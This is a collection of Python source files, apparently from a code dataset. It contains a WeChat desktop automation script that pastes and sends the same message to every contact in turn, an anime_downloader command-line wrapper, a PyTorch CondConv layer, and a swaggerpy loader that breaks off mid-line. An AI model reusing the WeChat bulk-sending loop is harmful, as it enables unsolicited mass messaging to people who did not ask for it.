text):\n \"\"\"设置窗口的标题\n hwnd为所要设置的窗口句柄\n text为所要设置成的窗口标题,\n 成功返回text, 失败返回None\n 注意,若为中文直接输入即可,不要在前面加u\n \"\"\"\n win32gui.SetWindowText(hwnd, text)\n _text = get_wnd_text(hwnd)\n if _text == text:\n return _text\n else:\n return None\n\n\ndef get_all_handles(filename, class_name, title=None):\n \"\"\"保存所要指定窗口的句柄到文件中\n filename为文件名\n class_name为要获取窗口的类名\n title为要获取的窗口的标题,可选项,默认为None\n \"\"\"\n hwnds_array = []\n new_title = \"saved\"\n while get_hwnd(class_name, title) != 0:\n hwnd = get_hwnd(class_name, title)\n hwnds_array.append(hwnd)\n change_wnd_text(hwnd, new_title)\n write_file(filename, 'w', hwnds_array)\n for hwnd in hwnds_array:\n change_wnd_text(hwnd, title)\n return hwnds_array\n\n\ndef hide_window(hwnd):\n \"\"\"传入句柄,将窗口最小化\n hwnd为所要设置的窗口句柄\n \"\"\"\n win32gui.ShowWindow(hwnd, win32con.SW_SHOWMINIMIZED)\n\n\ndef show_window(hwnd):\n \"\"\"传入句柄,将窗口复原显示\n hwnd为所要设置的窗口句柄\n \"\"\"\n win32gui.ShowWindow(hwnd, win32con.SW_SHOWNORMAL)\n\n\ndef set_active_window(hwnd):\n \"\"\"激活窗口\n \"\"\"\n win32gui.SetActiveWindow(hwnd)\n\n\ndef get_origin_point():\n \"\"\"设置窗口初始值\n \"\"\"\n zero_point = 50\n pos = [zero_point, zero_point, 500, 500]\n return pos\n\n\ndef dif_to_real(dif_x, dif_y):\n \"\"\"将相对位置转化为绝对位置\n \"\"\"\n origin = get_origin_point()\n origin_x = origin[0]\n origin_y = origin[1]\n real_x = origin_x + dif_x\n real_y = origin_y + dif_y\n return [real_x, real_y]\n\n\ndef move_window(hwnd, pos):\n \"\"\"传入句柄,将窗口移动到指定位置\n hwnd为所要设置的窗口句柄\n pos为要移动的位置\n \"\"\"\n win32gui.MoveWindow(hwnd, pos[0], pos[1], pos[2], pos[3], True)\n\n\ndef delay(delay_time):\n \"\"\"延时函数,单位ms\n \"\"\"\n time.sleep(delay_time/1000)\n\n\ndef init_to_start(hwnds_array, pos):\n \"\"\"传入句柄数组,移动到指定位置,为之后的操作做初始化\n hwnds_array为要初始化的句柄数组\n \"\"\"\n for hwnd in hwnds_array:\n print(\"start:\", hwnd)\n show_window(hwnd)\n move_window(hwnd, pos)\n return len(hwnds_array)\n\ndef left_click(pos_x, pos_y):\n win32api.SetCursorPos([pos_x, pos_y])\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0,0,0)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0,0,0)\n\n\ndef click_contacts():\n [contacts_x, contacts_y] = dif_to_real(20, 116)\n left_click(contacts_x, contacts_y)\n\n\n\n\ndef click_send_icon():\n X = 600\n for y in range(400, 580, 10):\n left_click(X, y)\n\n\ndef paste_message():\n \"\"\"paste the strting\n \"\"\"\n win32api.keybd_event(17, 0, 0, 0)\n win32api.keybd_event(86, 0, 0, 0)\n win32api.keybd_event(86, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(17, 0, win32con.KEYEVENTF_KEYUP, 0)\n\ndef send_message():\n \"\"\"粘贴后发送\n \"\"\"\n win32api.keybd_event(18, 0, 0, 0)\n win32api.keybd_event(83, 0, 0, 0)\n win32api.keybd_event(83, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(18, 0, win32con.KEYEVENTF_KEYUP, 0)\n\n\ndef keybd_down():\n win32api.keybd_event(40, 0, 0, 0)\n win32api.keybd_event(40, 0, win32con.KEYEVENTF_KEYUP, 0)\n\n\ndef get_mac_address():\n node = uuid.getnode()\n mac = uuid.UUID(int = node).hex[-12:]\n return mac\n\n\ndef get_cpu_info():\n c = wmi.WMI()\n for cpu in c.Win32_Processor():\n cpu_id = cpu.ProcessorId.strip()\n return cpu_id\n\n\ndef ency():\n mac = get_mac_address().encode(\"utf-8\")\n cpu_id = get_cpu_info().encode(\"utf-8\")\n mac_2 = base64.b64encode(mac)\n cpu_id_2 = base64.encodestring(cpu_id)\n ency_string = (mac_2 + cpu_id_2)\n return ency_string\n\n\ndef get_now_time():\n now_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime(time.time()))\n return now_time\n\n\ndef get_screen_range():\n SCREEN_SHOTS_LEFT_DIF_X = 510\n 
SCREEN_SHOTS_LEFT_DIF_Y = 110\n SCREEN_SHOTS_RIGHT_DIF_X = 630\n SCREEN_SHOTS_RIGHT_DIF_Y = 220\n SCREEN_SHOTS_LEFT_REAL = dif_to_real(SCREEN_SHOTS_LEFT_DIF_X, SCREEN_SHOTS_LEFT_DIF_Y)\n SCREEN_SHOTS_RIGHT_REAL = dif_to_real(SCREEN_SHOTS_RIGHT_DIF_X, SCREEN_SHOTS_RIGHT_DIF_Y)\n SCREEN_RANGE = (SCREEN_SHOTS_LEFT_REAL[0], SCREEN_SHOTS_LEFT_REAL[1], SCREEN_SHOTS_RIGHT_REAL[0], SCREEN_SHOTS_RIGHT_REAL[1])\n return SCREEN_RANGE\n\ndef get_screen_shots(SCREEN_RANGE, NEW_IMAGE_NAME):\n new_image = ImageGrab.grab(SCREEN_RANGE)\n new_image.save(NEW_IMAGE_NAME)\n\n\ndef remark_new_to_old(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n if os.path.isfile(NEW_IMAGE_NAME) == True:\n if os.path.isfile(OLD_IMAGE_NAME) == True:\n os.remove(OLD_IMAGE_NAME)\n else:\n print(\"OLD_IMAGE do not exist\")\n os.rename(NEW_IMAGE_NAME, OLD_IMAGE_NAME)\n else:\n print(\"NEW_IMAGE do not exist\")\n\n\ndef del_images_last_time(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n if os.path.isfile(NEW_IMAGE_NAME) == True:\n os.remove(NEW_IMAGE_NAME)\n print(\"NEW_IMAGE deleted\")\n else:\n print(\"NEW_IMAGE do not exist\")\n if os.path.isfile(OLD_IMAGE_NAME) == True:\n os.remove(OLD_IMAGE_NAME)\n print(\"OLD_IMAGE deleted\")\n else:\n print(\"OLD_IMAGE do not exist\")\n\n\ndef dif_image(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n if os.path.isfile(NEW_IMAGE_NAME) == True:\n if os.path.isfile(OLD_IMAGE_NAME) == True:\n new_image = Image.open(NEW_IMAGE_NAME)\n old_image = Image.open(OLD_IMAGE_NAME)\n h_new_image = new_image.histogram()\n h_old_image = old_image.histogram()\n result = math.sqrt(reduce(operator.add, list(map(lambda a, b: (a-b)**2, h_new_image, h_old_image)))/len(h_new_image))\n # print(result)\n return result\n else:\n return 1\n else:\n return 1\n\n\ndef get_key_state(key):\n key_state = win32api.GetAsyncKeyState(key)\n if key_state == 0:\n return False\n elif key_state == 1:\n return False\n elif key_state == -32767:\n return True\n elif key_state == -32768:\n return True\n\n\ndef get_F1_state():\n F1_state = get_key_state(win32con.VK_F1)\n return F1_state\n\n\ndef get_F12_state():\n F12_state = get_key_state(win32con.VK_F12)\n return F12_state\n\n\ndef get_is_pause():\n is_pause = False\n F12_state = get_F12_state()\n if F12_state == True:\n is_pause = True\n else:\n is_pause = False\n return is_pause\n\n\ndef is_pause():\n is_pause = get_is_pause()\n while (is_pause):\n F1_state = get_F1_state()\n if F1_state == True:\n is_pause = False\n else:\n is_pause = True\n\ndef test():\n filename = \"D:/handles\" \n # class_name = \"CabinetWClass\"\n # title = \"文件资源管理器\"\n class_name = \"WeChatMainWndForPC\"\n title = \"微信\"\n pos_sended = [300, 100, 500, 500]\n origin = get_origin_point()\n SCREEN_RANGE = get_screen_range()\n hwnds_array = get_all_handles(filename, class_name, title)\n init_to_start(hwnds_array, origin)\n print(len(hwnds_array), hwnds_array)\n for hwnd in hwnds_array:\n move_window(hwnd, origin)\n set_active_window(hwnd)\n del_images_last_time(OLD_IMAGE_NAME, NEW_IMAGE_NAME)\n i = 0\n while dif_image(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n click_contacts()\n keybd_down()\n delay(200)\n remark_new_to_old(OLD_IMAGE_NAME, NEW_IMAGE_NAME)\n get_screen_shots(SCREEN_RANGE, NEW_IMAGE_NAME)\n click_send_icon()\n delay(300)\n paste_message()\n send_message()\n i = i + 1\n print(i)\n is_pause()\n move_window(hwnd, pos_sended)\n hide_window(hwnd)\n change_wnd_text(hwnd, \"weichat\")\n print(\"finish:\", hwnd)\n print(\"Finish All\")\n for hwnd in hwnds_array:\n change_wnd_text(hwnd, title)\n\n\n\nnow_time = get_now_time()\nFILE_LOG = 
\"log.txt\"\nstring = ency()\nNEW_IMAGE_NAME = \"image_new.png\"\nOLD_IMAGE_NAME = \"image_old.png\"\n\nprint(string, INPUT_YOURS_SHIT)\nif string == INPUT_YOURS_SHIT:\n test()\n content = now_time + \": Succeed\", INPUT_YOURS_SHIT\n write_file(FILE_LOG, 'w', content)\n print(content)\nelse:\n content = now_time + \": fail\", INPUT_YOURS_SHIT\n write_file(FILE_LOG, 'w', content)\n print(content)\n pass\n\n\n\n\n\n\n\n# SCREEN_SHOTS_LEFT_DIF = [510, 110]\n# SCREEN_SHOTS_RIGHT_DIF = [630, 220]\n\n# \"WeChatMainWndForPC\", \"微信\"", "sub_path": "wc/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 9808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "win32gui.FindWindow", "line_number": 38, "usage_type": "call"}, {"api_name": "win32gui.GetWindowText", "line_number": 47, "usage_type": "call"}, {"api_name": "win32gui.SetWindowText", "line_number": 58, "usage_type": "call"}, {"api_name": "win32gui.ShowWindow", "line_number": 88, "usage_type": "call"}, {"api_name": "win32con.SW_SHOWMINIMIZED", "line_number": 88, "usage_type": "attribute"}, {"api_name": "win32gui.ShowWindow", "line_number": 95, "usage_type": "call"}, {"api_name": "win32con.SW_SHOWNORMAL", "line_number": 95, "usage_type": "attribute"}, {"api_name": "win32gui.SetActiveWindow", "line_number": 101, "usage_type": "call"}, {"api_name": "win32gui.MoveWindow", "line_number": 128, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 134, "usage_type": "call"}, {"api_name": "win32api.SetCursorPos", "line_number": 148, "usage_type": "call"}, {"api_name": "win32api.mouse_event", "line_number": 149, "usage_type": "call"}, {"api_name": "win32con.MOUSEEVENTF_LEFTDOWN", "line_number": 149, "usage_type": "attribute"}, {"api_name": "win32api.mouse_event", "line_number": 150, "usage_type": "call"}, {"api_name": "win32con.MOUSEEVENTF_LEFTUP", "line_number": 150, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 169, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 170, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 171, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 171, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 172, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 172, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 177, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 178, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 179, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 179, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 180, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 180, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 184, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 185, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 185, "usage_type": "attribute"}, {"api_name": "uuid.getnode", "line_number": 189, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 190, "usage_type": "call"}, {"api_name": "wmi.WMI", "line_number": 195, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 204, "usage_type": "call"}, {"api_name": "base64.encodestring", "line_number": 
205, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 211, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 211, "usage_type": "call"}, {"api_name": "time.time", "line_number": 211, "usage_type": "call"}, {"api_name": "PIL.ImageGrab.grab", "line_number": 226, "usage_type": "call"}, {"api_name": "PIL.ImageGrab", "line_number": 226, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 233, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 243, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path", "line_number": 247, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 256, "usage_type": "call"}, {"api_name": "os.path", "line_number": 256, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 257, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 257, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 258, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 258, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 261, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 261, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 261, "usage_type": "attribute"}, {"api_name": "win32api.GetAsyncKeyState", "line_number": 271, "usage_type": "call"}, {"api_name": "win32con.VK_F1", "line_number": 283, "usage_type": "attribute"}, {"api_name": "win32con.VK_F12", "line_number": 288, "usage_type": "attribute"}]} +{"seq_id": "215582288", "text": "import json\nimport sys \nimport subprocess\nimport importlib.util\n\ntry:\n from anime_downloader import get_anime_class, ALL_ANIME_SITES\nexcept ImportError:\n pass\n\ndef create_json(key, message):\n data = {}\n data[key] = message\n return json.dumps(data)\n\ndef install_dependency():\n python = sys.executable\n subprocess.check_call([python, \"-m\", \"pip\", \"install\", \"anime_downloader\"], stdout = subprocess.DEVNULL)\n\ndef check_dependency():\n dependency = importlib.util.find_spec(\"anime_downloader\")\n return dependency is not None\n\ndef get_supported_sites():\n return json.dumps(ALL_ANIME_SITES)\n\ndef search_anime(query, site):\n anime = get_anime_class(site)\n return json.dumps([dict(title=a.title, url=a.url, poster=a.poster) for a in anime.search(query)])\n\ndef get_anime(url, site):\n anime = get_anime_class(site)\n\n def dictify_anime(a):\n return dict(\n title = a.title,\n url = a.url,\n sitename = a.sitename,\n episode_count = len(a)\n )\n\n return json.dumps(dictify_anime(anime(url)))\n\ndef get_anime_episode(url, site, episode):\n anime = get_anime_class(site)\n\n return json.dumps(dictify_episode(anime(url), episode))\n\ndef get_anime_episode_2(query, site, episode):\n 
provider = get_anime_class(site)\n result = provider.search(query)[0]\n anime = provider(result.url)\n\n return json.dumps(dictify_episode(anime, episode))\n\ndef dictify_episode(a, episode):\n e = a[episode]\n return dict(\n title = a.title,\n number = e.ep_no,\n stream_url = e.source().stream_url\n )\n\nif len(sys.argv) < 2:\n print(create_json(\"error\", \"invalid syntax\"), flush = True)\n quit()\n\nif sys.argv[1] == \"--supported\":\n print(get_supported_sites())\nelif sys.argv[1] == \"--search\":\n print(search_anime(sys.argv[2], sys.argv[3]))\nelif sys.argv[1] == \"--get-anime\":\n print(get_anime(sys.argv[2], sys.argv[3]))\nelif sys.argv[1] == \"--get-episode\":\n print(get_anime_episode(sys.argv[2], sys.argv[3], int(sys.argv[4]) - 1))\nelif sys.argv[1] == \"--get-episode-smart\":\n print(get_anime_episode_2(sys.argv[2], sys.argv[3], int(sys.argv[4]) - 1))\nelif sys.argv[1] == \"--install-deps\":\n install_dependency()\n print(create_json(\"status\", \"installed dependencies\"))\nelif sys.argv[1] == \"--check-deps\":\n print(create_json(\"dependency\", check_dependency()))\n\nsys.stdout.flush()\n", "sub_path": "scripts/anime.py", "file_name": "anime.py", "file_ext": "py", "file_size_in_byte": 2399, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 17, "usage_type": "attribute"}, {"api_name": "subprocess.check_call", "line_number": 18, "usage_type": "call"}, {"api_name": "subprocess.DEVNULL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "importlib.util.util.find_spec", "line_number": 21, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 21, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 21, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "anime_downloader.ALL_ANIME_SITES", "line_number": 25, "usage_type": "argument"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 50, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 77, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 81, "usage_type": 
"attribute"}, {"api_name": "sys.stdout.flush", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "125600041", "text": "\"\"\"\n5-Dez-21\nhttps://github.com/xmu-xiaoma666/External-Attention-pytorch/blob/master/model/conv/CondConv.py\n\"\"\"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass Attention(nn.Module):\n def __init__(self, in_planes, K, init_weight=True):\n super().__init__()\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.net = nn.Conv2d(in_planes, K, kernel_size=1, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n if init_weight:\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode=\"fan_out\", nonlinearity=\"relu\")\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n if isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x):\n att = self.avgpool(x) # bs,dim,1,1\n att = self.net(att).view(x.shape[0], -1) # bs,K\n return self.sigmoid(att)\n\n\nclass CondConv(nn.Module):\n def __init__(\n self,\n in_planes,\n out_planes,\n kernel_size,\n stride,\n padding=0,\n dilation=1,\n grounps=1,\n bias=True,\n K=4,\n init_weight=True,\n ):\n super().__init__()\n self.in_planes = in_planes\n self.out_planes = out_planes\n self.kernel_size = kernel_size\n self.stride = stride\n self.padding = padding\n self.dilation = dilation\n self.groups = grounps\n self.bias = bias\n self.K = K\n self.init_weight = init_weight\n self.attention = Attention(in_planes=in_planes, K=K, init_weight=init_weight)\n\n self.weight = nn.Parameter(\n torch.randn(K, out_planes, in_planes // grounps, kernel_size, kernel_size),\n requires_grad=True,\n )\n if bias:\n self.bias = nn.Parameter(torch.randn(K, out_planes), requires_grad=True)\n else:\n self.bias = None\n\n if self.init_weight:\n self._initialize_weights()\n\n # TODO 初始化\n\n def _initialize_weights(self):\n for i in range(self.K):\n nn.init.kaiming_uniform_(self.weight[i])\n\n def forward(self, x):\n bs, in_planels, h, w = x.shape\n softmax_att = self.attention(x) # bs,K\n x = x.view(1, -1, h, w)\n weight = self.weight.view(self.K, -1) # K,-1\n aggregate_weight = torch.mm(softmax_att, weight).view(\n bs * self.out_planes,\n self.in_planes // self.groups,\n self.kernel_size,\n self.kernel_size,\n ) # bs*out_p,in_p,k,k\n\n if self.bias is not None:\n bias = self.bias.view(self.K, -1) # K,out_p\n aggregate_bias = torch.mm(softmax_att, bias).view(-1) # bs,out_p\n output = F.conv2d(\n x,\n weight=aggregate_weight,\n bias=aggregate_bias,\n stride=self.stride,\n padding=self.padding,\n groups=self.groups * bs,\n dilation=self.dilation,\n )\n else:\n output = F.conv2d(\n x,\n weight=aggregate_weight,\n bias=None,\n stride=self.stride,\n padding=self.padding,\n groups=self.groups * bs,\n dilation=self.dilation,\n )\n\n output = output.view(bs, self.out_planes, h, w)\n return output\n\n\nif __name__ == \"__main__\":\n input = torch.randn(2, 32, 64, 64)\n m = CondConv(\n in_planes=32, out_planes=64, kernel_size=3, stride=1, padding=1, bias=False\n )\n out = m(input)\n print(out.shape)\n", "sub_path": "code/arch/conv/CondConv.py", "file_name": "CondConv.py", "file_ext": "py", "file_size_in_byte": 3809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, 
{"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 96, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "615166863", "text": "#\n# Copyright (c) 2013, Digium, Inc.\n#\n\n\"\"\"Code for handling the base Swagger API model.\n\"\"\"\n\nimport json\nimport os\nimport urllib\nimport urlparse\nimport requests\n\nfrom swaggerpy.jsonify import jsonify\nfrom swaggerpy.processors import SwaggerProcessor, SwaggerError\n\nSWAGGER_VERSIONS = [\"1.1\", \"1.2\"]\n\nSWAGGER_PRIMITIVES = [\n 'void',\n 'string',\n 'boolean',\n 'number',\n 'int',\n 'long',\n 'double',\n 'float',\n 'Date',\n]\n\n\ndef 
compare_versions(lhs, rhs):\n \"\"\"Performs a lexicographical comparison between two version numbers.\n\n This properly handles simple major.minor.whatever.sure.why.not version\n numbers, but fails miserably if there's any letters in there.\n\n For reference:\n 1.0 == 1.0\n 1.0 < 1.0.1\n 1.2 < 1.10\n\n :param lhs: Left hand side of the comparison\n :param rhs: Right hand side of the comparison\n :return: < 0 if lhs < rhs\n :return: == 0 if lhs == rhs\n :return: > 0 if lhs > rhs\n \"\"\"\n lhs = [int(v) for v in lhs.split('.')]\n rhs = [int(v) for v in rhs.split('.')]\n return cmp(lhs, rhs)\n\n\nclass ValidationProcessor(SwaggerProcessor):\n \"\"\"A processor that validates the Swagger model.\n \"\"\"\n def process_resource_listing(self, resources, context):\n required_fields = ['basePath', 'apis', 'swaggerVersion']\n validate_required_fields(resources, required_fields, context)\n\n if not resources.swaggerVersion in SWAGGER_VERSIONS:\n raise SwaggerError(\n \"Unsupported Swagger version %s\" % resources.swaggerVersion,\n context)\n\n def process_resource_listing_api(self, resources, listing_api, context):\n validate_required_fields(listing_api, ['path', 'description'], context)\n\n if not listing_api.path.startswith(\"/\"):\n raise SwaggerError(\"Path must start with /\", context)\n\n def process_api_declaration(self, resources, resource, context):\n required_fields = [\n 'swaggerVersion', 'basePath', 'resourcePath', 'apis',\n 'models'\n ]\n validate_required_fields(resource, required_fields, context)\n # Check model name and id consistency\n for (model_name, model) in resource.models:\n if model_name != model.id:\n raise SwaggerError(\"Model id doesn't match name\", context)\n # Convert models dict to list\n\n def process_resource_api(self, resources, resource, api, context):\n required_fields = ['path', 'operations']\n validate_required_fields(api, required_fields, context)\n\n def process_operation(self, resources, resource, api, operation, context):\n required_fields = ['httpMethod', 'nickname']\n validate_required_fields(operation, required_fields, context)\n\n def process_parameter(self, resources, resource, api, operation, parameter,\n context):\n required_fields = ['name', 'paramType']\n validate_required_fields(parameter, required_fields, context)\n if parameter.paramType == 'path':\n # special handling for path parameters\n parameter.required = True\n parameter.dataType = 'string'\n else:\n # dataType is required for non-path parameters\n validate_required_fields(parameter, ['dataType'], context)\n if 'allowedValues' in parameter:\n raise SwaggerError(\n \"Field 'allowedValues' invalid; use 'allowableValues'\",\n context)\n\n def process_error_response(self, resources, resource, api, operation,\n error_response, context):\n required_fields = ['code', 'reason']\n validate_required_fields(error_response, required_fields, context)\n\n def process_model(self, resources, resource, model, context):\n required_fields = ['id', 'properties']\n validate_required_fields(model, required_fields, context)\n # Move property field name into the object\n for (prop_name, prop) in model.properties:\n prop.name = prop_name\n\n def process_property(self, resources, resource, model, prop,\n context):\n required_fields = ['type']\n validate_required_fields(prop, required_fields, context)\n\n\ndef json_load_url(session, url):\n \"\"\"Download and parse JSON from a URL, wrapping in a Jsonify.\n\n :param url: URL for JSON to parse\n :return: Parse JSON dict\n \"\"\"\n scheme = 
urlparse.urlparse(url).scheme\n if scheme == 'file':\n # requests can't handle file: URL's\n fp = urllib.urlopen(url)\n try:\n return json.load(fp)\n finally:\n fp.close()\n else:\n resp = session.get(url)\n resp.raise_for_status()\n return resp.json()\n\n\nclass Loader(object):\n def __init__(self, session, processors=None):\n self.session = session\n if processors is None:\n processors = []\n # always go through the validation processor first\n self.processors = [ValidationProcessor()]\n self.processors.extend(processors)\n\n def load_resource_listing(self, resources_url, base_url=None):\n \"\"\"Load a resource listing.\n\n :param resources_url: File name for resources.json\n :param base_url: Optional URL to be the base URL for finding API\n declarations. If not specified, 'basePath' from the\n resource listing is used.\n \"\"\"\n\n # Load the resource listing\n resource_listing_dict = json_load_url(self.session, resources_url)\n\n # Some extra data only known about at load time\n resource_listing_dict['url'] = resources_url\n if not base_url:\n base_url = resource_listing_dict.get('basePath')\n\n # Load the API declarations\n for api in resource_listing_dict.get('apis'):\n self.load_api_declaration(base_url, api)\n\n # Now that the raw object model has been loaded, apply the processors\n resource_listing_json = self.process_resource_listing(\n resource_listing_dict)\n\n return resource_listing_json\n\n def load_api_declaration(self, base_url, api_dict):\n path = api_dict.get('path').replace('{format}', 'json')\n api_dict['url'] = 